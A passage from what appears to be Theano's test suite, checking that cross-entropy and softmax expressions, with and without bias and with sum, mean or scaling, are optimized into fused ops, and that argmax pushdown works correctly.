        rng = numpy.random.RandomState(utt.fetch_seed())
        invec_val = rng.rand(3).astype(config.floatX)
        inmat_val = rng.rand(3, 2).astype(config.floatX)
        inidx_val = [0, 1, 0]
        self._compile_and_check(
            [invec, inmat, inidx],
            [CrossentropyCategorical1HotGrad()(invec, inmat, inidx)],
            [invec_val, inmat_val, inidx_val],
            CrossentropyCategorical1HotGrad)
class T_CrossentropyCategorical1Hot(utt.InferShapeTester):
def test_grad(self):
x = tensor.matrix('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(x, one_of_n)
f = theano.function([x, one_of_n], xe)
x_val = numpy.asarray([[.4, .6, .0], [.1, .8, .1]],
dtype=config.floatX)
xe_val = f(x_val, [0, 1])
assert numpy.allclose(xe_val, -numpy.log([.4, .8]))
def oplike(x):
return op(x, [0, 1])
tensor.verify_grad(oplike, [x_val], rng=numpy.random)
def test_infer_shape(self):
admat = matrix()
alvec = lvector()
rng = numpy.random.RandomState(utt.fetch_seed())
admat_val = rng.rand(3, 2).astype(config.floatX)
alvec_val = [0, 1, 0]
self._compile_and_check([admat, alvec],
[CrossentropyCategorical1Hot()(admat, alvec)],
[admat_val, alvec_val],
CrossentropyCategorical1Hot)
def test_softmax_optimizations(self):
x = tensor.matrix('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(x, one_of_n)
fgraph = gof.FunctionGraph(
[x, one_of_n],
[op(softmax_op(x), one_of_n)])
assert fgraph.outputs[0].owner.op == op
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_vector(self):
x = tensor.vector('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
fgraph = gof.FunctionGraph(
[x, one_of_n],
[op(softmax_op(x), one_of_n)])
assert fgraph.outputs[0].owner.op == op
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_w_bias(self):
x = tensor.matrix('x')
b = tensor.vector('b')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(x, one_of_n)
fgraph = gof.FunctionGraph(
[x, b, one_of_n],
[op(softmax_op(x + b), one_of_n)])
assert fgraph.outputs[0].owner.op == op
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op
# print printing.pprint(node.outputs[0])
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
# print printing.pprint(node.outputs[0])
# print '===='
assert len(fgraph.toposort()) == 2
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_w_bias2(self):
x = tensor.matrix('x')
b = tensor.vector('b')
c = tensor.vector('c')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
fgraph = gof.FunctionGraph(
[x, b, c, one_of_n],
[op(softmax_op(T.add(x, b, c)), one_of_n)])
assert fgraph.outputs[0].owner.op == op
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
# print '===='
assert len(fgraph.toposort()) == 3
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_optimizations_w_bias_vector(self):
x = tensor.vector('x')
b = tensor.vector('b')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
fgraph = gof.FunctionGraph(
[x, b, one_of_n],
[op(softmax_op(x + b), one_of_n)])
assert fgraph.outputs[0].owner.op == op
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op
# print printing.pprint(node.outputs[0])
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op
# print '===='
assert len(fgraph.toposort()) == 3
assert str(fgraph.outputs[0].owner.op) == 'OutputGuard'
assert (fgraph.outputs[0].owner.inputs[0].owner.op ==
crossentropy_softmax_argmax_1hot_with_bias)
def test_softmax_grad_optimizations(self):
x = tensor.matrix('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(softmax_op(x), one_of_n)
sum_xe = tensor.sum(xe)
g_x = tensor.grad(sum_xe, x)
fgraph = gof.FunctionGraph(
[x, one_of_n],
[g_x])
self.assertTrue(hasattr(fgraph.outputs[0].tag, 'trace'))
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op, node.inputs
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op, node.inputs
has_cx1hot = False
has_cx1hotdx = False
has_softmax = False
has_softmaxdx = False
for node in fgraph.toposort():
if node.op == crossentropy_softmax_argmax_1hot_with_bias:
has_cx1hot = True
if node.op == crossentropy_softmax_1hot_with_bias_dx:
has_cx1hotdx = True
if node.op == softmax_op:
has_softmax = True
if node.op == softmax_grad:
has_softmaxdx = True
assert not has_cx1hot
assert has_cx1hotdx
assert has_softmax
assert not has_softmaxdx
def test_softmax_grad_optimizations_vector(self):
x = tensor.vector('x')
one_of_n = tensor.lvector('one_of_n')
op = crossentropy_categorical_1hot
xe = op(softmax_op(x), one_of_n)
sum_xe = tensor.sum(xe)
g_x = tensor.grad(sum_xe, x)
fgraph = gof.FunctionGraph(
[x, one_of_n],
[g_x])
# print 'BEFORE'
# for node in fgraph.toposort():
# print node.op, node.inputs
# print '----'
theano.compile.mode.optdb.query(
theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
# print 'AFTER'
# for node in fgraph.toposort():
# print node.op, node.inputs
has_cx1hot = False
has_cx1hotdx = False
has_softmax = False
has_softmaxdx = False
for node in fgraph.toposort():
if node.op == crossentropy_softmax_argmax_1hot_with_bias:
has_cx1hot = True
if node.op == crossentropy_softmax_1hot_with_bias_dx:
has_cx1hotdx = True
if node.op == softmax_op:
has_softmax = True
if node.op == softmax_grad:
has_softmaxdx = True
assert not has_cx1hot
assert has_cx1hotdx
assert has_softmax
assert not has_softmaxdx
    def test_get_rid_of_advanced_indexing_version_of_xent(self):
        # Cross-entropy written with advanced indexing, i.e.
        #   -log(softmax(x))[arange(y.shape[0]), y]
        # in its four sign/placement variants — with or without a bias, with
        # sum or mean — must be rewritten to the fused
        # crossentropy_softmax_argmax_1hot_with_bias op, its gradient to
        # crossentropy_softmax_1hot_with_bias_dx, and no AdvancedSubtensor
        # may remain in the optimized graph.
        verbose = 0
        # TODO: add the optimization in FAST_COMPILE?
        # In the mean time, run it as 'FAST_RUN' instead
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(3, 5).astype(config.floatX)
        b_val = rng.randn(5).astype(config.floatX)
        y_val = numpy.asarray([2, 4, 1])
        x = T.matrix('x')
        b = T.vector('b')
        y = T.lvector('y')
        # Basic case
        expressions = [
            T.sum(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y]),
            T.sum(-T.log(softmax(x))[T.arange(y.shape[0]), y])
        ]
        for expr in expressions:
            # Verify the optimizer worked on the expressions
            f = theano.function([x, y], expr, mode=mode)
            self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                assert len(ops) == 4
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            # Also verify the gradient wrt x
            g = theano.function([x, y], T.grad(expr, x), mode=mode)
            self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) == 2
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_op in ops
                assert softmax_grad not in ops
                g(x_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
        # Test that a biased softmax is optimized correctly
        bias_expressions = [
            T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
            T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
        for expr in bias_expressions:
            f = theano.function([x, b, y], expr, mode=mode)
            self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                assert len(ops) == 2  # [big_op, sum]
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                f(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
            self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) == 2
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_with_bias in ops
                assert softmax_grad not in ops
                g(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
        # Test that using "mean" instead of sum works, too
        mean_expressions = [
            T.mean(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y]),
            T.mean(-T.log(softmax(x))[T.arange(y.shape[0]), y])]
        for expr in mean_expressions:
            f = theano.function([x, y], expr, mode=mode)
            self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                assert len(ops) == 6
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            g = theano.function([x, y], T.grad(expr, x), mode=mode)
            self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) == 5
                #there's an extra dimshuffle in there
                # but I can't think of a good rule to get rid of it
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_op in ops
                assert softmax_grad not in ops
                g(x_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
        mean_bias_expressions = [
            T.mean(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
            -T.mean(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
            -T.mean(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
            T.mean(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
        for expr in mean_bias_expressions:
            f = theano.function([x, b, y], expr, mode=mode)
            self.assertTrue(hasattr(f.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                assert len(ops) == 4
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                # NOTE(review): unlike every other case, f is never called
                # with values here — possibly an oversight; confirm.
            except Exception:
                theano.printing.debugprint(f)
                raise
            g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
            self.assertTrue(hasattr(g.maker.fgraph.outputs[0].tag, 'trace'))
            if verbose:
                theano.printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) == 5
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_with_bias in ops
                assert softmax_grad not in ops
                g(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
    def test_xent_thing_int32(self):
        # Same advanced-indexing cross-entropy rewrite as above, but the
        # label vector is cast to int32; the cast adds one op to the
        # expected graph sizes (5 forward, 3 gradient).
        verbose = 0
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(3, 5).astype(config.floatX)
        y_val = numpy.asarray([2, 4, 1], dtype='int64')
        x = T.matrix('x')
        y = T.lvector('y')
        yi = T.cast(y, 'int32')
        expressions = [
            T.sum(-T.log(softmax(x)[T.arange(yi.shape[0]), yi])),
            -T.sum(T.log(softmax(x)[T.arange(yi.shape[0]), yi])),
            -T.sum(T.log(softmax(x))[T.arange(yi.shape[0]), yi]),
            T.sum(-T.log(softmax(x))[T.arange(yi.shape[0]), yi])
        ]
        for expr in expressions:
            # Verify the optimizer worked on the expressions
            f = theano.function([x, y], expr, mode=mode)
            if verbose:
                theano.printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                assert len(ops) == 5
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            # Also verify the gradient wrt x
            g = theano.function([x, y], T.grad(expr, x), mode=mode)
            if verbose:
                theano.printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) == 3
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_op in ops
                assert softmax_grad not in ops
                g(x_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
    def test_optimize_xent_vector(self):
        # Single-example variant: x is a vector, so the optimized graphs
        # contain extra dimshuffle ops (5 forward, 4 gradient) but must
        # still use the fused cross-entropy ops.
        verbose = 0
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(5).astype(config.floatX)
        y_val = numpy.asarray([2])
        x = T.vector('x')
        y = T.lvector('y')
        # Test that a biased softmax is optimized correctly
        bias_expressions = [
            T.sum(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y]))]
        for expr in bias_expressions:
            f = theano.function([x, y], expr, mode=mode)
            if verbose:
                printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                assert len(ops) == 5
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            g = theano.function([x, y], T.grad(expr, x), mode=mode)
            if verbose:
                printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) == 4
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_op in ops
                assert softmax_grad not in ops
                g(x_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
    def test_optimize_xent_vector2(self):
        # Vector variant with a bias term; the sum_div_dimshuffle_bug
        # warning is temporarily silenced while compiling the gradient.
        verbose = 0
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(5).astype(config.floatX)
        b_val = rng.randn(5).astype(config.floatX)
        y_val = numpy.asarray([2])
        x = T.vector('x')
        b = T.vector('b')
        y = T.lvector('y')
        # Test that a biased softmax is optimized correctly
        bias_expressions = [
            T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
            T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
        for expr in bias_expressions:
            f = theano.function([x, b, y], expr, mode=mode)
            if verbose:
                printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                # [big_op, sum, dim_shuffle]
                assert len(ops) == 3
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            backup = config.warn.sum_div_dimshuffle_bug
            config.warn.sum_div_dimshuffle_bug = False
            try:
                g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
            finally:
                config.warn.sum_div_dimshuffle_bug = backup
            if verbose:
                printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) <= 6
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_with_bias in ops
                assert softmax_grad not in ops
                g(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
    def test_optimize_xent_vector3(self):
        # Same as test_optimize_xent_vector2, but y is the result of
        # a "flatten", and it used to make the constant-folding
        # of arange(y.shape[0]) happen before the xent optimization
        verbose = 0
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(5).astype(config.floatX)
        b_val = rng.randn(5).astype(config.floatX)
        y_val = numpy.asarray([2])
        x = T.vector('x')
        b = T.vector('b')
        y_ = T.lvector('y_')
        y = y_.flatten()
        # Test that a biased softmax is optimized correctly
        bias_expressions = [
            T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
            T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
        for expr in bias_expressions:
            f = theano.function([x, b, y_], expr, mode=mode)
            if verbose:
                printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                # [big_op, sum, dim_shuffle, flatten]
                assert len(ops) <= 4
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            backup = config.warn.sum_div_dimshuffle_bug
            config.warn.sum_div_dimshuffle_bug = False
            try:
                # NOTE(review): the gradient function takes the derived `y`
                # (flatten of y_) as input, not `y_` like f above — confirm
                # this is intentional.
                g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
            finally:
                config.warn.sum_div_dimshuffle_bug = backup
            if verbose:
                printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) <= 6
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_with_bias in ops
                assert softmax_grad not in ops
                g(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
    def test_optimize_xent_vector4(self):
        # Same as test_optimize_xent_vector2, but y is the result of
        # a "specify_shape" that indicates its length is 1, so the
        # constant-folding of arange(y.shape[0]) happen before the xent
        # optimization
        verbose = 0
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(5).astype(config.floatX)
        b_val = rng.randn(5).astype(config.floatX)
        y_val = numpy.asarray([2])
        x = T.vector('x')
        b = T.vector('b')
        y_ = T.lvector('y_')
        y = T.specify_shape(y_, (1,))
        # Test that a biased softmax is optimized correctly
        bias_expressions = [
            T.sum(-T.log(softmax(x + b)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(b + x)[T.arange(y.shape[0]), y])),
            -T.sum(T.log(softmax(x + b))[T.arange(y.shape[0]), y]),
            T.sum(-T.log(softmax(b + x))[T.arange(y.shape[0]), y])]
        for expr in bias_expressions:
            f = theano.function([x, b, y_], expr, mode=mode)
            if verbose:
                printing.debugprint(f)
            try:
                ops = [node.op for node in f.maker.fgraph.toposort()]
                # [big_op, sum, dim_shuffle, specify_shape]
                assert len(ops) <= 4
                assert crossentropy_softmax_argmax_1hot_with_bias in ops
                assert not [1 for o in ops
                            if isinstance(o, T.AdvancedSubtensor)]
                f(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(f)
                raise
            backup = config.warn.sum_div_dimshuffle_bug
            config.warn.sum_div_dimshuffle_bug = False
            try:
                g = theano.function([x, b, y], T.grad(expr, x), mode=mode)
            finally:
                config.warn.sum_div_dimshuffle_bug = backup
            if verbose:
                printing.debugprint(g)
            try:
                ops = [node.op for node in g.maker.fgraph.toposort()]
                assert len(ops) <= 6
                assert crossentropy_softmax_1hot_with_bias_dx in ops
                assert softmax_with_bias in ops
                assert softmax_grad not in ops
                g(x_val, b_val, y_val)
            except Exception:
                theano.printing.debugprint(g)
                raise
    def test_crossentropy_softmax_1hot_with_bias_dxcale_cost(self):
        # Scaling the cross-entropy cost by a scalar `a` (sum or mean, with
        # several sign placements) must still trigger the fused forward and
        # gradient optimizations; also checks gradients supplied through
        # known_grads.
        # TODO: add the optimization in FAST_COMPILE?
        # In the mean time, run it as 'FAST_RUN' instead
        mode = theano.compile.mode.get_default_mode()
        if mode == theano.compile.mode.get_mode('FAST_COMPILE'):
            mode = 'FAST_RUN'
        rng = numpy.random.RandomState(utt.fetch_seed())
        x_val = rng.randn(3, 5).astype(config.floatX)
        y_val = numpy.asarray([2, 4, 1])
        x = T.matrix('x')
        y = T.lvector('y')
        a = T.scalar('a')
        def validate_fn_graph(func):
            # The graph of the function should not have softmax anymore
            has_cx1hot = False
            has_softmax = False
            for node in func.maker.fgraph.toposort():
                if node.op == crossentropy_softmax_argmax_1hot_with_bias:
                    has_cx1hot = True
                if node.op == softmax_op:
                    has_softmax = True
            assert has_cx1hot
            assert not has_softmax
        def validate_grad_graph(func):
            # The graph of the gradient should not have softmaxgrad anymore
            has_cx1hotdx = False
            has_softmax = False
            has_softmaxdx = False
            for node in func.maker.fgraph.toposort():
                if node.op == crossentropy_softmax_1hot_with_bias_dx:
                    has_cx1hotdx = True
                if node.op == softmax_op:
                    has_softmax = True
                if node.op == softmax_grad:
                    has_softmaxdx = True
            assert has_cx1hotdx
            assert has_softmax
            assert not has_softmaxdx
        # Cases to test
        expressions = [
            a * T.sum(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -a * T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y])),
            a * (-T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y]))),
            a * T.sum(T.log(softmax(x)[T.arange(y.shape[0]), y])),
            a * T.sum(-T.log(softmax(x))[T.arange(y.shape[0]), y]),
            -a * T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y]),
            a * (-T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y])),
            a * T.sum(T.log(softmax(x))[T.arange(y.shape[0]), y]),
            a * T.mean(-T.log(softmax(x)[T.arange(y.shape[0]), y])),
            -a * T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y])),
            a * (-T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y]))),
            a * T.mean(T.log(softmax(x)[T.arange(y.shape[0]), y])),
            a * T.mean(-T.log(softmax(x))[T.arange(y.shape[0]), y]),
            -a * T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y]),
            a * (-T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y])),
            a * T.mean(T.log(softmax(x))[T.arange(y.shape[0]), y]),
        ]
        for expr in expressions:
            # Verify the optimizer worked on the expressions
            f = theano.function([x, y, a], expr, mode=mode)
            try:
                assert 5 <= len(f.maker.fgraph.toposort()) <= 10
                validate_fn_graph(f)
                f(x_val, y_val, 0.1)
            except Exception:
                theano.printing.debugprint(f)
                raise
            # Verify the gradient wrt x
            g = theano.function([x, y, a], T.grad(expr, x), mode=mode)
            try:
                assert 3 <= len(g.maker.fgraph.toposort()) <= 6
                validate_grad_graph(g)
                g(x_val, y_val, 0.1)
            except Exception:
                theano.printing.debugprint(g)
                raise
            # Verify the gradient when providing output gradient
            h = theano.function([x, y, a],
                T.grad(expr, x, known_grads={expr: a * x.sum()}), mode=mode)
            try:
                assert 6 <= len(h.maker.fgraph.toposort()) <= 8
                validate_grad_graph(h)
                h(x_val, y_val, 0.1)
            except Exception:
                theano.printing.debugprint(h)
                raise
def test_argmax_pushdown():
    # The argmax part (output [1]) of max_and_argmax over monotonic elemwise
    # ops applied to softmax should be pushed past those ops (they don't
    # change which element is largest); the max part (output [0]) must NOT
    # be pushed down since its value depends on them.
    x = tensor.matrix()
    for sm in [softmax_graph, softmax_op]:
        # test that the max_and_argmax is pushed down if the max is not used
        out = tensor.max_and_argmax(
            sm(tensor.exp(tensor.tanh(sigmoid(x)))),
            axis=-1)[1]
        fgraph = gof.FunctionGraph(
            [x],
            [out])
        theano.compile.mode.optdb.query(
            theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
        # print 'AFTER'
        # for node in fgraph.toposort():
        # print node.op
        assert len(fgraph.toposort()) == 2  # an output_guard is second
        assert fgraph.toposort()[0].op == tensor.basic._max_and_argmax
        assert str(fgraph.toposort()[1].op) == 'OutputGuard'
        x = tensor.matrix()
        # test that the max_and_argmax is not pushed down if the max is used
        out = tensor.max_and_argmax(
            sm(tensor.exp(tensor.tanh(sigmoid(x)))),
            axis=-1)[0]
        fgraph = gof.FunctionGraph(
            [x],
            [out])
        assert hasattr(fgraph.outputs[0].tag, 'trace')
        backup = config.warn.argmax_pushdown_bug
        config.warn.argmax_pushdown_bug = False
        try:
            theano.compile.mode.optdb.query(
                theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
        finally:
            config.warn.argmax_pushdown_bug = backup
        # print 'AFTER'
        # for node in fgraph.toposort():
        # print node.op
        assert len(fgraph.toposort()) == 4  # an output_guard is second
        assert isinstance(fgraph.toposort()[0].op, tensor.Elemwise)
        assert isinstance(fgraph.toposort()[1].op, Softmax)
        assert isinstance(fgraph.toposort()[2].op, tensor.CAReduce)
        assert isinstance(fgraph.toposort()[2].op.scalar_op, theano.scalar.Maximum)
        assert str(fgraph.toposort()[3].op) == 'OutputGuard'
def test_argmax_pushdown_bias():
    # Same pushdown checks as test_argmax_pushdown, but through
    # softmax_with_bias: argmax ignores the (monotonic) softmax, while the
    # max output keeps the SoftmaxWithBias op in the graph.
    x = tensor.matrix()
    b = tensor.vector()
    out = tensor.argmax(softmax_with_bias(x, b), axis=-1)
    fgraph = gof.FunctionGraph(
        [x, b],
        [out])
    f = theano.function([x, b], out)
    assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
    theano.compile.mode.optdb.query(
        theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
    # print 'AFTER'
    # for node in fgraph.toposort():
    # print node.op
    assert len(fgraph.toposort()) == 4
    assert isinstance(fgraph.toposort()[0].op, tensor.DimShuffle)
    assert isinstance(fgraph.toposort()[1].op, tensor.Elemwise)
    assert isinstance(fgraph.toposort()[2].op, tensor.MaxAndArgmax)
    assert str(fgraph.toposort()[3].op) == 'OutputGuard'
    x = tensor.matrix()
    b = tensor.vector()
    out = tensor.max_and_argmax(softmax_with_bias(x, b), axis=-1)[0]
    fgraph = gof.FunctionGraph(
        [x, b],
        [out])
    f = theano.function([x, b], out)
    assert hasattr(f.maker.fgraph.outputs[0].tag, 'trace')
    backup = config.warn.argmax_pushdown_bug
    config.warn.argmax_pushdown_bug = False
    try:
        theano.compile.mode.optdb.query(
            theano.compile.mode.OPT_FAST_RUN).optimize(fgraph)
    finally:
        config.warn.argmax_pushdown_bug = backup
    # print 'AFTER'
    # for node in fgraph.toposort():
    # print node.op
    assert len(fgraph.toposort()) == 3
    assert isinstance(fgraph.toposort()[0].op, SoftmaxWithBias)
    assert isinstance(fgraph.toposort()[1].op, tensor.CAReduce)
    assert isinstance(fgraph.toposort()[1].op.scalar_op, theano.scalar.Maximum)
    assert str(fgraph.toposort()[2].op) == 'OutputGuard'
def test_asymptotic_32():
    """
    This test makes sure that our functions behave sensibly when
    huge values are present
    """
    # TODO: consider adding the optimization of crossentropy into the current
    # mode for the purpose of running this test
    for dtype in 'float32', 'float64':
        if dtype == 'float32':
            x = tensor.fmatrix()
            x2 = tensor.fvector()
        else:
            x = tensor.dmatrix()
            x2 = tensor.dvector()
        y = tensor.lvector()
        c = categorical_crossentropy(softmax(x + x2), y)
        f = theano.function([x, y, x2], [c.sum(),
                            tensor.grad(c.sum(), x)], mode='FAST_RUN')
        if 0:
            for i, n in enumerate(f.maker.fgraph.toposort()):
